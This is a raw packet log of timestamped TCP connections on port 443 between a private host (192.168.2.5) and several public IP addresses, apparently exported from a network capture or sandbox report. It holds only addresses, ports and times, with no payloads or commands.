                                                                                                                                                                                                                                    Dec 18, 2024 09:52:25.571500063 CET4434985845.77.249.79192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:25.577416897 CET49858443192.168.2.545.77.249.79
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:25.578507900 CET49858443192.168.2.545.77.249.79
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:25.578546047 CET4434985845.77.249.79192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:27.405767918 CET4434985845.77.249.79192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:27.405886889 CET49858443192.168.2.545.77.249.79
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:27.407210112 CET49858443192.168.2.545.77.249.79
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:27.407239914 CET4434985845.77.249.79192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:27.407591105 CET4434985845.77.249.79192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:27.456346989 CET49858443192.168.2.545.77.249.79
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:27.456409931 CET49858443192.168.2.545.77.249.79
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:27.456501007 CET4434985845.77.249.79192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:28.314632893 CET4434985845.77.249.79192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:28.314735889 CET4434985845.77.249.79192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:28.314820051 CET49858443192.168.2.545.77.249.79
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:28.315787077 CET49858443192.168.2.545.77.249.79
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:28.315836906 CET4434985845.77.249.79192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:28.315866947 CET49858443192.168.2.545.77.249.79
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:28.315882921 CET4434985845.77.249.79192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:29.766948938 CET49869443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:29.767043114 CET44349869104.131.68.180192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:29.767132998 CET49869443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:29.767527103 CET49869443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:29.767560959 CET44349869104.131.68.180192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.001991987 CET44349869104.131.68.180192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.002104044 CET49869443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.004056931 CET49869443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.004077911 CET44349869104.131.68.180192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.004494905 CET44349869104.131.68.180192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.005565882 CET49869443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.005609989 CET49869443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.005676031 CET44349869104.131.68.180192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.418703079 CET44349869104.131.68.180192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.418895960 CET44349869104.131.68.180192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.418999910 CET49869443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.419092894 CET49869443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.419132948 CET44349869104.131.68.180192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.419176102 CET49869443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:31.419190884 CET44349869104.131.68.180192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:33.287966013 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:33.288026094 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:33.288093090 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:33.288395882 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:33.288444996 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:34.686058044 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:34.686183929 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:34.687685013 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:34.687706947 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:34.688117981 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:34.689285994 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:34.731359005 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.623876095 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.623939037 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.623969078 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.623981953 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.624027014 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.624063015 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.624063015 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.624092102 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.807091951 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.807183981 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.807224035 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.807254076 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.807394028 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.837446928 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.837500095 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.837543011 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.837559938 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.837609053 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.837632895 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.837687016 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.838330030 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.838330030 CET49879443192.168.2.523.55.153.106
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.838363886 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:35.838392019 CET4434987923.55.153.106192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:36.152328968 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:36.152360916 CET44349886172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:36.152442932 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:36.152720928 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:36.152733088 CET44349886172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:37.376281023 CET44349886172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:37.376405001 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:37.377782106 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:37.377788067 CET44349886172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:37.378273964 CET44349886172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:37.379432917 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:37.379450083 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:37.379515886 CET44349886172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:38.082796097 CET44349886172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:38.083060980 CET44349886172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:38.083117962 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:38.088246107 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:38.088258028 CET44349886172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:38.088268042 CET49886443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:38.088273048 CET44349886172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:38.237624884 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:38.237670898 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:38.237734079 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:38.238006115 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:38.238022089 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:39.453787088 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:39.453861952 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:39.454879045 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:39.454885960 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:39.455946922 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:39.456957102 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:39.456971884 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:39.457119942 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496213913 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496347904 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496413946 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496433020 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496463060 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496649027 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496727943 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496731997 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496757030 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.496788979 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.501876116 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.501952887 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.501975060 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.510288954 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.510349989 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.510360003 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.554651976 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.554662943 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.601511955 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.616103888 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.657480001 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.687030077 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.687194109 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.687243938 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.687254906 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.690836906 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.690888882 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.690896034 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.690996885 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.691014051 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.691014051 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.691040039 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.691055059 CET49892443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.691061974 CET44349892172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.867337942 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.867373943 CET44349899172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.867441893 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.867676973 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:40.867691040 CET44349899172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.080538034 CET44349899172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.080645084 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.081726074 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.081757069 CET44349899172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.082099915 CET44349899172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.083146095 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.083334923 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.083384991 CET44349899172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.809397936 CET44349899172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.809655905 CET44349899172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.809665918 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.809729099 CET49899443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.903053045 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.903086901 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.903158903 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.903374910 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:42.903390884 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.116682053 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.116780996 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.122091055 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.122109890 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.122607946 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.123806000 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.123918056 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.123950005 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.124000072 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:44.167359114 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.600436926 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.600666046 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.600740910 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.600965023 CET49905443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.600992918 CET44349905172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.871339083 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.871429920 CET44349915172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.871541977 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.871814966 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:46.871850967 CET44349915172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.083441019 CET44349915172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.083642006 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.085151911 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.085164070 CET44349915172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.085483074 CET44349915172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.086608887 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.086777925 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.086813927 CET44349915172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.086909056 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:48.086918116 CET44349915172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:49.829741001 CET44349915172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:49.829901934 CET44349915172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:49.829993963 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:49.830117941 CET49915443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:49.830157042 CET44349915172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:50.155078888 CET49922443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:50.155170918 CET44349922172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:50.155267954 CET49922443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:50.155905962 CET49922443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:50.155944109 CET44349922172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:51.363493919 CET44349922172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:51.363600016 CET49922443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:51.365372896 CET49922443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:51.365403891 CET44349922172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:51.365840912 CET44349922172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:51.367216110 CET49922443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:51.367285013 CET49922443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:51.367300987 CET44349922172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:52.899408102 CET44349922172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:52.899506092 CET44349922172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:52.899672031 CET49922443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:52.899749994 CET49922443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:52.899801016 CET44349922172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:53.282990932 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:53.283055067 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:53.283243895 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:53.283430099 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:53.283463955 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.488568068 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.488684893 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.489768982 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.489800930 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.490148067 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.494441986 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.495090008 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.495157003 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.495291948 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.495340109 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.495873928 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.495938063 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.496958971 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.497009993 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.497227907 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.497286081 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.497555017 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.497621059 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.497641087 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.497656107 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.497894049 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.497941971 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.497991085 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.498811960 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.498862982 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.543363094 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.545711040 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.545779943 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.545861006 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.545883894 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.545926094 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.545949936 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.545978069 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:54.545991898 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:57.870899916 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:57.871126890 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:57.871145010 CET44349932172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:57.871206045 CET49932443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:57.896272898 CET49943443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:57.896326065 CET44349943172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:57.896426916 CET49943443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:57.896651983 CET49943443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:57.896681070 CET44349943172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:59.111591101 CET44349943172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:59.111699104 CET49943443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:59.112771034 CET49943443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:59.112808943 CET44349943172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:59.113219976 CET44349943172.67.157.254192.168.2.5
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:59.114367008 CET49943443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:59.114413977 CET49943443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                    Dec 18, 2024 09:52:59.114473104 CET44349943172.67.157.254192.168.2.5
